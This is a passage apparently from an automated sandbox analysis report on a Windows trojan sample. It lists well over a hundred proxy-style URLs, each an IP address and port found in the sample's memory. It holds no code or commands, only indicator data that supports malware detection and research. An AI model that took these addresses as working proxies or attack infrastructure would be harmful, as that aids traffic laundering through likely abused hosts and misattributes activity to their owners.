                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.178.129:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.178.129:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.249.74:7497
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.249.74:7497://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.42.194.37:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.42.194.37:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.44.191.108:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.44.191.108:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.92.56.162:39500
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.92.56.162:39500://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.21.53.111:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.21.53.111:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.24.205.252:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.24.205.252:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.24.77.90:55555
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.24.77.90:55555://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.42.215:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.42.215:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.75.25:4444
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.75.25:4444://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.75.25:4444x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.96.180:5566
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.96.180:5566://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.106.93:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.106.93:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.118.176:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.118.176:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.66.30:61465
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA51E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.66.30:614652
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4FF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.66.30:61465://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:13247
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C846E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:13247://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAFA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:14075
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:14075://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:15460
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:15460://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:28501
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:28501://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:29631
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:29631://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8333000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:3769
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:3769://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:42147
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:42147://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:48821
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:48821://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8029000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:53728
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:53728://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:56732
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:56732://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAFCB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:59522
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:59522://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:59990
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:59990://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:62181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.2.102:62181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.177.143
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.177.143://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.177.143:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.84.209:26154
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.84.209:26154://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.84.209:33091
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.84.209:33091://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.84.209:62842
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.84.209:62842://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.84.209:9445
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.84.209:9445://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.85.79:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.85.79:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.90.1:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.90.1:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.56.101.184:21681
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.56.101.184:21681://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.14.159
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.14.159://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.14.159:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA84C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.147.11:62801
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.147.11:62801://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.178.220:12438
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.178.220:12438://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.178.222:12438
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.178.222:12438://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.2.185
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.2.185://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.243.214
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.243.214://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.243.214:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:23449
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:23449://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:32953
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:32953://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:51138
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:51138://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:52276
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C691F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:52276://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:6147
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:6147://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.80.76
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.80.76://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.80.76:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.83.118.9
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.83.118.9://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.12.46.62:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.12.46.62:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:30508
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:30508://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:40234
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:40234://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:51825
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:51825://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.135.195.236:43705
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.135.195.236:43705://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C782D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.135.195.236:55580
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.135.195.236:55580://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DEA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.135.46.7:10286
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.135.46.7:10286://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC87000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.195.54:30727
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.195.54:30727://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C674C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.195.54:53639
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.195.54:53639://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.195.54:57409
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.195.54:57409://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.195.54:57409x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.106.95:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.106.95:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.40.100:30318
